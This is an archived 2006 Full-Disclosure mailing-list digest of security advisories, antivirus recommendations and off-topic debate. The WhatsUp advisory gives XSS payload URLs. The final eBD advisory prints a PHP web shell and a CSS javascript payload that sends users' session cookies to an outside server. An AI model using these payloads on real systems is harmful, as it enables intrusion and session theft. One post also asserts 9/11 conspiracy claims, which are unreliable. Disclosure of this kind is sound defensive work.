[Full-disclosure] Free antivirus software
Hi! Looking for something like Free AV software for Win32 OS's. If u r using something good - pls let me know! Arsen Kirillov ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Free antivirus software
Arsen, Grisoft AVG has a free edition for home use http://free.grisoft.com/doc/1 cheers Ivan On 5/11/06, ArsenKirillov [EMAIL PROTECTED] wrote: Hi! Looking for something like Free AV software for Win32 OS's. If u r using something good - pls let me know! Arsen Kirillov ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Free antivirus software
On 5/11/06, ArsenKirillov wrote: Hi! Looking for something like Free AV software for Win32 OS's. If u r using something good - pls let me know! On 5/11/06, Ivan wrote: Arsen, Grisoft AVG has a free edition for home use http://free.grisoft.com/doc/1 cheers Ivan I have used AVG and also Avast! Antivirus Home Edition: http://www.avast.com/eng/avast_4_home.html And also AntiVir PersonalEdition Classic: http://www.free-av.com/ They all have seemed to me to work well. -Eliah ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft MSDTC NdrAllocate Validation Vulnerability
Shouldnt this be considered low risk and not medium? On Wed, 10 May 2006 17:01:09 -0700 Avert [EMAIL PROTECTED] wrote: McAfee, Inc. McAfee Avert(tm) Labs Security Advisory Public Release Date: 2006-05-09 Microsoft MSDTC NdrAllocate Validation Vulnerability CVE-2006-0034 ___ ___ * Synopsis There is an RPC procedure within the MSDTC interface in msdtcprx.dll that may be called remotely without user credentials in such a way that triggers a denial-of-service in the Distributed Transaction Coordinator (MSDTC) service. Exploitation can at most lead to a denial of service and therefore the risk factor is at medium. ___ ___ * Vulnerable Systems Microsoft Windows 2000 Microsoft Windows XP Microsoft Windows Server 2003 ___ ___ * Vulnerability Information The msdtcprx.dll shared library contains RPC procedures for use with the Distributed Transaction Coordinator (MSDTC) service utilized in Microsoft Windows. By sending a large (greater than 4k) request to BuildContextW(), a size check can be bypassed and a bug in NdrAllocate() may be reached. This vulnerability was reported to Microsoft on October 12, 2005 ___ ___ * Resolution Microsoft has provided a patch for this issue. Please see their bulletin, KB913580, for more information on obtaining and installing the patch. ___ ___ * Credits This vulnerability was discovered by Chen Xiaobo of McAfee Avert Labs. ___ ___ ___ ___ * Legal Notice Copyright (C) 2006 McAfee, Inc. The information contained within this advisory is provided for the convenience of McAfee's customers, and may be redistributed provided that no fee is charged for distribution and that the advisory is not modified in any way. McAfee makes no representations or warranties regarding the accuracy of the information referenced in this document, or the suitability of that information for your purposes. McAfee, Inc. and McAfee Avert Labs are registered Trademarks of McAfee, Inc. and/or its affiliated companies in the United States and/or other Countries. All other registered and unregistered trademarks in this document are the sole property of their respective owners. ___ ___ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Free antivirus software
Hi! Review: Free Antivirus Software http://antivirus.about.com/od/antivirussoftwarereviews/a/freeav.htm Regards, Valdis Shkesters - Original Message - From: ArsenKirillov [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Thursday, May 11, 2006 11:10 AM Subject: [Full-disclosure] Free antivirus software Hi! Looking for something like Free AV software for Win32 OS's. If u r using something good - pls let me know! Arsen Kirillov ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] RE: Oracle - the last word
This has always been the problem with Oracle especially from the top down, arrogance Joe -Original Message- From: David Litchfield [mailto:[EMAIL PROTECTED] Sent: Tuesday, May 09, 2006 10:34 PM To: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Oracle - the last word A few people have asked me recently what it is I'm actually looking for from Oracle. I have a nice little laundry list of things, of course, but mostly all I've been waiting for is to hear Oracle to say, We admit we have a problem with regards to security, but here's our strategy and we're going to make it better. In that simple admission would lie the cessation of my criticism of Oracle. But, let's face it, it's not a simple admission in reality. As a business, Oracle can't say, Oops. We've been mistaken all these years - turns out our database isn't a secure as we actually thought. A company like Microsoft can, and indeed did, something just like that but their business was never built on what was supposed to be a reputation for and a foundation of security. It would be business suicide for Oracle to do this. After much rumination, the obvious struck me: Oracle could make their product more secure (and improve the behind-the-scenes processes that enable them to deliver a secure product) and all the while admit to nothing. Whilst I've been throwing tantrums at their failure to admit to the truth, Oracle has been working on doing this. It almost passed me by. They're not there yet but they are getting closer. Let me put that in concrete terms: When Oracle 10g Release 1 was released you could spend a day looking for bugs and find thirty. When 10g Release 2 was released I had to spend two weeks looking to find the same number. Soon, and I have no time frame in mind for soon, Oracle will have arrived at a point where sitting down and finding a single bug will take a month - and not once would they have had to admit to having problems with security. They'll have solved it. Their tools will be tight and their processes slick. They'll almost be Unbreakable. I'm sure the strategists at Oracle must have realized this - for an organization such as Oracle it's really the only reasonable option available. Okay, it's not the open strategy that I'd have preferred but, in the end, the journey of how they got/get there, to a secure robust product, is irrelevant. Another thing that struck me was the amount of effort and time that it must have taken to get a lumbering stegosaurus of a beast like Oracle to turn around. I can only assume that, as CSO, Mary Ann must credited with that, and as such, I revise my position on her. Dare I say it, well done, Mary. I realize now that this is how it's going to be - I'm not going to get my much sought after admission but at least we get a better, more secure product we can be more confident in. Besides, I weary of Oracle bashing and I've no doubt that I've wearied many here on these list over the years, too. NGS will, of course, continue to research and find Oracle security flaws, report them and help Oracle to fix them but, from now on, I'll leave the proselytizing to others. Oracle have moved sufficiently forward enough, and with enough momentum (now), that I believe they've passed the point of no return and can do nothing but eventually end up where we all want them to be. Cheers, David Litchfield NGSSoftware Ltd http://www.ngssoftware.com/ +44(0) 208 401 0070 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Free antivirus software
Review: Free Antivirus Software http://antivirus.about.com/od/antivirussoftwarereviews/a/freeav.htm I believe I've seen Mary post here before, so if you're reading Mary, how come this time you didn't test removal capabilities? Lots of times people don't actually go looking for a free AV program until they need to scan and clean their machine so removal is an important feature. Geo. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Free antivirus software
http://www.clamwin.com/ Thank You Randall M = You too can have your very own Computer! Note: Side effects include: Blue screens; interrupt violation; illegal operations; remote code exploitations; virus and malware infestations; and other unknown vulnerabilities. [-Original Message- [From: [EMAIL PROTECTED] [[mailto:[EMAIL PROTECTED] On Behalf [Of ArsenKirillov [Sent: Thursday, May 11, 2006 3:10 AM [To: full-disclosure@lists.grok.org.uk [Subject: [Full-disclosure] Free antivirus software [ [Hi! [ [Looking for something like Free AV software for Win32 OS's. If [u r using something good - pls let me know! [ [Arsen Kirillov [ [___ [Full-Disclosure - We believe in it. [Charter: http://lists.grok.org.uk/full-disclosure-charter.html [Hosted and sponsored by Secunia - http://secunia.com/ [ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [TZO-042006] Insecure Auto-Update and File execution (2)
Dear List, As my advisory has been a bit unclear in certain regards, I would like to clarify a few questions I have received briefly : - The Auto update problem with Zango Adware remains, there was no fix. - The Adware component is distributed by over 10.000 affilates everyday and I expect it to be installed on millions of workstations (IMO). - If you compromise (or alter) a DNS server this gives immediate access to internal client machines. The impact as citing Kevin F. is : Dns server pwnage and then mass client ownage -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: UltimateZip unacev2.dll Buffer Overflow Vulnerability
== Secunia Research 11/05/2006 - UltimateZip unacev2.dll Buffer Overflow Vulnerability - == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software * UltimateZip version 2.7.1, 3.0.3, and 3.1b. Other versions may also be affected. == 2) Severity Rating: Moderately Critical Impact: System Access Where: Remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in UltimateZip, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in UNACEV2.DLL when extracting an ACE archive containing a file with an overly long filename. This can be exploited to cause a stack-based buffer overflow when a user extracts a specially crafted ACE archive. The vulnerability is related to: SA16479 == 4) Solution Do not extract ACE archives from untrusted sources. == 5) Time Table 26/04/2006 - Initial vendor notification. 27/04/2006 - Second vendor notification. 04/05/2006 - Third vendor notification. 11/05/2006 - Public disclosure. (No reply from vendor) == 6) Credits Discovered by Secunia Research. == 7) References SA16479: http://secunia.com/advisories/16479/ The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2005-2856 for the vulnerability. == 8) About Secunia Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website: http://secunia.com/ Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration. Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2006-29/advisory/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200605-13 ] MySQL: Information leakage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200605-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Low Title: MySQL: Information leakage Date: May 11, 2006 Bugs: #132146 ID: 200605-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A MySQL server may leak information to unauthorized users. Background == MySQL is a popular multi-threaded, multi-user SQL database server. Affected packages = --- Package / Vulnerable / Unaffected --- 1 dev-db/mysql 4.1.19 = 4.1.19 Description === The processing of the COM_TABLE_DUMP command by a MySQL server fails to properly validate packets that arrive from the client via a network socket. Impact == By crafting specific malicious packets an attacker could gather confidential information from the memory of a MySQL server process, for example results of queries by other users or applications. By using PHP code injection or similar techniques it would be possible to exploit this flaw through web applications that use MySQL as a database backend. Note that on 5.x versions it is possible to overwrite the stack and execute arbitrary code with this technique. Users of MySQL 5.x are urged to upgrade to the latest available version. Workaround == There is no known workaround at this time. Resolution == All MySQL users should upgrade to the latest version. # emerge --sync # emerge --ask --oneshot --verbose =dev-db/mysql-4.1.19 References == [ 1 ] Original advisory http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2006-05/msg00041.html [ 2 ] CVE-2006-1516 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1516 [ 3 ] CVE-2006-1517 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1517 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200605-13.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MS06-019 - How long before this develops into a self propagating email worm
On 5/10/06, Juha-Matti Laurio [EMAIL PROTECTED] wrote: threat meters: Seriously, threat meters are a waste of time and should be scraped by all. UK has said it will never implement a terrorism threat meter, as the Bush administration already does to create a sense of public fear when the political climate requires the government to have public support on issues. It is known that U.S government has rasied the threat meter when their poll rating is low, to get the public on-side that we know more than you do, just trust us. propaganda. Would a threat meter have stopped 9/11 from happening? And what do you do if the meter goes to high alert? Are folks supposed to stop their everyday lives and start looking at everyone who looks of eastern origin in a paranoia frenzy? On 7/7 the London bombings, the government and security services were caught by suprise, they had no idea about the threat yet innocent folks died and the city of London went into lock down over fears of further attacks, so much so, an innocent member of the public was shot, because the police thought he was a potential suicide bomber. He wasn't, the police had commited a murder, because of fear, the fear and paranoia the terrorists wanted the government and the public to have, they won in London, and the terrorists won in American too. Look at the way America has reacted, in the same way the UK government and intelligence services have. In the way the terrorists planned it to be. To create a fear, a paranoia, a terror in the minds of everyone. Threat meters, what do they do? They play the role of the terrorist, bring fear, let the public know the terrorists are around. Even though only one building in one city or one train in one city would be target, the whole entire nation is put on an artifical high state of alert. The government of U.S don't even say high state of alert for X city, they just have some threat meter covering the entire U.S The same goes for the internet. We're always being told that terrorism will one day come to cyber terrorism and hit governments and businesses hard. Yet no specific targets are ever mentioned. Its a threat meter for all, everyone, the so-called cyber security agencies can't even give estimates or likely ness of attack, they just rasie a threat meter to create a hype and a need to buy the products X security company has on offer to protect consumers and corporations from imminent attack. Lets call it paranoia meter because its heresay, there is no particuler threat. Just because a vulnerability is wild and not patched, does not pose a threat. In terrorism a threat is specific information that an attack is being planned. Although, the internet threat meters are lamer than the main land threat meter (and even the mainland threat meter is lame), because its completely based on heresay, theres an unptached vulnerability, this could happen, but we don't have any intelligence whatsoever that something is being programmed, but we thought we'd raise the internet threat level, you know because theres nothing else happening. Basically, the cyber security companies are creating a hype to be suggestive to malicious users, and of course the malicious users will often bow to such a threat level and release an exploit worm to the wild. Although, thats how it used to be. The bad guys have realised now how much money these cyber agencies are making out of exploit virii, that they've decided not to launch an attack, based on their threat meters. The only time a real threat will come is when cyber agencies are off-watch. Why would an attack be launched if governments and businesses are expecting something to happen? The element of suprise is as important as the terrorism which gives them the name terrorist. I conclude to say, the cyber security companies, were once good at their predictve attack guesstimations, but no longer. In today's climate (right now) folks are more than aware of whats going on around. No longer will the would-be exploit virii offer play lap puddle to cyber security agencies, mcafee, symantec, trendmicro, us-cert and the others. Attacks will come at the least expected point. Attacks won't come based on code you guys are aware of. Attacks will come without warning. Attacks will coem when you least expect it. Attacks will never be predicted, will never have an early warning for, will always be a suprise from now on. Welcome to the future. Times are changing. You can create a paranoia amougst the community, but the new kids on the block aren't playing a destructive game of tig between malicious users and security vendors. The ball is in the malicious users court. Each time you raise your threat level and nothing happens is eating away at the credibility of security vendors, although the bad guys always will have a cool nack of creeping up on everyone when they least expect it. Rasie your threat meters, you're spoiling your own business by doing so, malicious users the more they hold off
Re: [Full-disclosure] MS06-019 - How long before this develops into a self propagating email worm
n3td3v wrote: On 5/10/06, Juha-Matti Laurio [EMAIL PROTECTED] wrote: threat meters: Seriously, threat meters are a waste of time and should be scraped by all. Hey, I believe it's right to tell someone when they're wrong and give them credit when they're right... and although I disagree with some of your conclusions, I have to say that you've got a good point here. About all that these threat meters do is drum people into action. That is, deep down, a good thing, but it's something that people should be careful with. Computers, and in particular computer security, is something that many people think is magic. An organization that is not well mitigated and is not vigilant is as likely to get cracked into during a high threat level as it is at a low threat level... the threat meters do give people a false sense of security and a false sense of fear and really do only measure paranoia. Now, that's not to say that they don't have a use, but like all tools if it's misused, the results will not necessarily be good. Something to keep in mind. -bkfsec ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Free antivirus software
Hi Geo, I do removal tests for spyware/adware only. The virus detection scores come from AV-Test.org and at the time, removal results for those particular products weren't readily available to me. (This doesn't mean that AV-Test.org does not have them or did not at the time - please interpret my limited answer as *my* limitation and not a reflection of AV-Test.org). West Coast Labs performs removal testing as part of their Anti-Virus Level 2 certification (all ItW viruses are included in these tests according to their documentation). You can find a list of Anti-Virus Level 2 certified products at: http://www.westcoastlabs.org/cm-av-list.asp?Cat_ID=2 AV-Test.org is a project of the Business-Information-Workgroup at the Institute of Technical and Business Information Systems at the Otto-von-Guericke University Magdeburg (Germany) in cooperation with AV-Test GmbH. For details, visit: http://www.av-test.org/ I agree that virus removal tests would be a nice addition to the review - unfortunately my resources (time) only allow for spyware/adware. -- Mary - Original Message - From: Geo. [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Thursday, May 11, 2006 6:05 AM Subject: Re: [Full-disclosure] Free antivirus software Review: Free Antivirus Software http://antivirus.about.com/od/antivirussoftwarereviews/a/freeav.htm I believe I've seen Mary post here before, so if you're reading Mary, how come this time you didn't test removal capabilities? Lots of times people don't actually go looking for a free AV program until they need to scan and clean their machine so removal is an important feature. Geo. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MS06-019 - How long before this develops into a self propagating email worm
bkfsec wrote: I have to say that you've got a good point here. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ These threat meters play lip service for hackers. Thereees zero-day in the wild, you're going to get haxx3d A threat is ment to be based on individuals planning something, not a here-say. Regardz, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MS06-019 - How long before this develops into a self propagating email worm
On Thu, 11 May 2006 19:15:50 BST, n3td3v said: Thereees zero-day in the wild, you're going to get haxx3d It's more like We now know about a zero-day that's been on the loose for some unknown amount of time, and you may already be hax0red. And if you haven't, you probably will be as soon as the script kiddies who are even more lame than our security professionals find the zero-day. HAND. pgpsxcTRSwh13.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] **LosseChange::Debunk it??**
OK, the video shows a lot of nonsense facts. I'm not an aviation engineer, but technical educated. I don't think that there where real explosions when the towers went down, but I did not hear any verifyable clarification about the impact in the pentagon. This is the part, which makes me distrustful. So, if possible - does anyone have an explanation about the pentagon impact as shown in the video? Regards, Eisi On Thursday 11 May 2006 02:19, Morning Wood wrote: the only fact worth investigating in this is the sales of stocks leading up to 911. viewed from a technical standpoint on the pentagon attack and the towers collapse... well this is just pure bullshit. anyone with basic physics and any amount of avation experience can see the author is absolutly clueless in regards to these technical points. my2bits, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MS06-019 - How long before this develops into a self propagating email worm
On 5/11/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Thu, 11 May 2006 19:15:50 BST, n3td3v said: Thereees zero-day in the wild, you're going to get haxx3d It's more like We now know about a zero-day that's been on the loose for some unknown amount of time, and you may already be hax0red. And if you haven't, you probably will be as soon as the script kiddies who are even more lame than our security professionals find the zero-day. HAND. Code alone is not a threat. Its obvious these security companies never have specific intelligence of worms being planned. All they can base their threat meters on is a generalization. Which one is the threat: A gun store has opened on the corner, someone might buy a gun and shoot or I overheard a conversation that johnny average is annoyed at bob and spoke about revenge, he's really into guns, and a gun store has just opened on the corner, johnny is mentally unstable, and he's really good at hitting his targets, he shot someone in the past but no one told the police. Regardz, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MS06-019 - How long before this develops into aself propagating email worm
Thereees zero-day in the wild, you're going to get haxx3d It's more like We now know about a zero-day that's been on the loose for some unknown amount of time, and you may already be hax0red. And if you haven't, you probably will be as soon as the script kiddies who are even more lame than our security professionals find the zero-day. HAND. Code alone is not a threat. Its obvious these security companies never have specific intelligence of worms being planned. All they can base their threat meters on is a generalization. Which one is the threat: A gun store has opened on the corner, someone might buy a gun and shoot or I overheard a conversation that johnny average is annoyed at bob and spoke about revenge, he's really into snip They both are. The first is, of course, more general and is based upon increased _opportunity_. The second is a specific threat based upon specific intelligence. Bringing this back to the world of computer security: most major Internet worms that use an overflow as their vector have exploit previously announced flaws - with a patch being available - for example Blaster, Slammer, Code Red. With the current situation, we have increased opportunity: that is, there is a pre-authentication attack vector in a commonly used product which is not commonly firewalled. In other words, almost all the right ingredients for an Internet worm. If passed experience is anything to go by the only missing ingredient is proof of concept code released by a well meaning security researcher! Cheers, David Litchfield ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] **LosseChange::Debunk it??**
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Yo Eisi! On Thu, 11 May 2006, [EMAIL PROTECTED] wrote: So, if possible - does anyone have an explanation about the pentagon imp act as shown in the video? Here is a good start: http://www.indybay.org/news/2005/12/1787340.php It gets a few things wrong, but is a good start. Still it is a good starting point if you have too much free time on your hands. RGDS GARY - --- Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701 [EMAIL PROTECTED] Tel:+1(541)382-8588 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.1 (GNU/Linux) iD8DBQFEY6PF8KZibdeR3qURAnWcAKDgHy7QKKXzx4SvTcYtvJ6D1UuG7gCg0QsA a0/Bo+MuV7dJfI6YKeRUJpc= =kaR+ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] **LosseChange::Debunk it??**
First disturbing thing about these videos is the amount of people who instanly say how fake they are. This one was a bit different. I don't believe the author even thinks he is 100% correct, but if some video from a gas station or a hotel rooftop captured this event, well then why would you not say here it is and show it to everyone? Would seeing more proof not just enforce thier position even more? Personally I can't believe a plane, made out of metal vaporized, vanished, and the people inside it did not. The seat, gone. The overhead compartement full of laptops, ipods, clothing, etc, gone. The serving trays, the oxygen masks, the luggage, the animals in the luggage compartment, gone. The huge metal wings, the Rolls-Royce engine, the tail section much larger then the small 12-16 foot hole, gone. But miraculously all the people could be identified. Come on. If you actually subscribe to this list, there is no way you could possibly believe that crock. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Ipswitch WhatsUp Professional multiple flaws
WhatsUp is a tool from Ipswitch to monitor application and network,
embedding a custom web server on port 8022.
Description:
This custom web server is prone to multiple flaws.
-as authenticated user:
*src disclosure
http://server:8022/NmConsole/Login.asp.
*there are many XSS flaws, as
http://server:8022/NmConsole/Navigation.asp?sDeviceView=SCRIPTalert(me);/SCRIPTnDeviceID=SCRIPTalert(me);/SCRIPT
http://server:8022/NmConsole/ToolResults.asp?bIsIE=truenToolType=0sHostname=%3cscript%3ealert('me')%3c/script%3enTimeout=2000nCount=1nSize=32btnPing=Ping
*redirection
http://server:8022/NmConsole/DeviceSelection.asp?sRedirectUrl=Reports/DevicePassiveMonitorSyslog.aspsCancelURL=http://www.google.fr
-not being authenticated:
*src disclosure
http://server:8022/NmConsole/Login.asp.
*network nodes information disclosure (name, internal addr, service)
http://server:8022/NmConsole/utility/RenderMap.asp?nDeviceGroupID=0
The weaknesses have been confirmed in version 2006, source disclosure
in version 2005 and 2005 SP1 too.
Other versions may also be affected.
No response from vendor.
Solution:
-Filtered TCP port 8022, ask a patch from vendor if you are a registered user
-Keep an eye on an opensource project: http://gnms.rubyforge.org
David Maciejak
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [EEYEB-20060307] Apple QuickTime FPX Integer Overflow
Apple QuickTime FPX Integer Overflow Release Date: May 11, 2006 Date Reported: March 7, 2006 Patch Development Time (In Days): 65 Severity: High (Remote Code Execution) Vendor: Apple Systems Affected: Quicktime on Windows 2000 Quicktime on Windows XP Quicktime on Mac OS X 10.3.9 References: This vulnerability has been assigned CVE-2006-1249 Overview: eEye Digital Security has discovered a critical vulnerability in QuickTime Player. There is a integer overflow in the way QuickTime processes fpx format files. An attacker can create a fpx file and send it to the user via email, web page, or fpx file with activex. Technical Description: In an fpx file, there is a field that figures out how many blocks of data there are in that file. One block data size is 0x200, QuickTime Player will allocate memory relying on (number*0x200) but does not check the size value and an integer overflow can occur. If you set the block value to 0x80 an integer overflow will occur which will then cause a heap overflow and write invalid memory. QuickTime: QuickTime File Format http://developer.apple.com/documentation/QuickTime/QTFF/index.html Protection: Retina Network Security Scanner has been updated to identify this vulnerability. Blink - Endpoint Vulnerability Prevention - preemptively protects from this vulnerability. Vendor Status: Apple has released a patch for this vulnerability information is available at http://docs.info.apple.com/article.html?artnum=61798 Credit: Discovery: Fang Xing Copyright (c) 1998-2006 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email [EMAIL PROTECTED] for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Several flaws in e-business designer (eBD)
Regards
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
===
- Advisory -
===
Tittle: Several flaws in e-business designer
Risk: Critical
Date: 03.May.2006
Author: Pedro Andújar pandujar [EMAIL PROTECTED] selfdefense.es
URL: http://www.digitalsec.es
http://www.514.es/
.: [ INTRO ] :.
eBD is an Integrated Development Environment for the development and
publication of web sites,
web applications and web services (Applications). In about 60% of the time
typically required,
Designer expedites the creation of Applications based on an open architecture,
accepted web
standards and without the need for in-depth knowledge about web technology.
With eBD, you can develop any type of web application, web site or web
service - intranet,
extranet, eCommerce, eLearning portals, etc. You can deploy legacy applications
on the web
without re-coding the original application.
eBusiness Designer has three distinct functional layers - Presentation, Data
and Back Office.
This structure permits a non-technical staff member to update any Application
in real time,
preview and publish it.
.: [ TECHNICAL DESCRIPTION ] :.
During the development of some evaluation tasks against applications managed
by the e-businness
designer software, several bugs were discovered:
.: [ BUG #1 ]
Risk: High
Description : Ability to upload files to the system without
authentication
Affected versions : = v3.1.4
Access to a web edition tool without authentication, allow remote users to
upload files without
restriction. This vulnerability can be achieved accessing the following URL:
http://ebdsite/common/html_editor/image_browser.upload.html
The file can be placed in different folders of the application, usually it
can be easily found
exploring the web source code and searching the images folder. Another useful
tool to
find the file is:
http://edbsite/common/html_editor/image_browser.html
Additionally we have the html edition tool, whose parameters are:
function
abre_html_editor(form_name,name,ancho,alto,idvista,atributo,source,links)
{
var argumentos = form_name= + form_name + name= + name +
source= + source +
ebd_links= + links;
if (idvista != null idvista 0)
argumentos += usar_vista= + idvista;
if (atributo != null atributo.length 0)
argumentos += usar_atributo= + atributo;
var href = /common/html_editor/html_editor.html?
The result of this vulnerability consists in the ability of upload and/or
modify files in
the system, giving the possiblity of attack both the server and web users.
These kind of attacks were succeded against a server running 2.3.3 version of
eBD:
Server side exploiting:
+ Code execution in the system using php/asp...shells : If the system has php
installed,
command execution is possible through a web browser, uploading a file with the
following content:
dsr.php-
?
$out = shell_exec($_GET[cmd]. 21);
echo pre$out/pre;
?
dsr.php-
Then, queries like http://edbsite/path/to/dsr.phpcmd=uname -a ; id can be
executed.
Client side exploiting:
+ Cross Site Scripting (XSS), in applications with authentication methods:
Uploaded files with
image_browser.upload.html can overwrite application files, so it will be
possible to include a
javascript code in a cascade style sheet (.css), which will send us the cookie
of users who have
logged, through a get request to our server:
background:
url('javascript:document.images[1].src=http://514.es/514.php?+document.cookie;')
repeat-x bottom;
We can place a script in our server to log cookies we receive, even this job is
already
done by the access_log.
XXX.XXX.XXX.XXX - - [25/Apr/2006:11:04:22 +0200] GET
/514.php?SESSION_ID=133844640fde6ef7bd6a7a9e1c5c4651
HTTP/1.1 200 316
http://ebdsite/?go=M8z23wqOtZxBnlKqIOyVzEdlo87WFfqH8prlq33Nju/nsQ==;
Mozilla/4.0
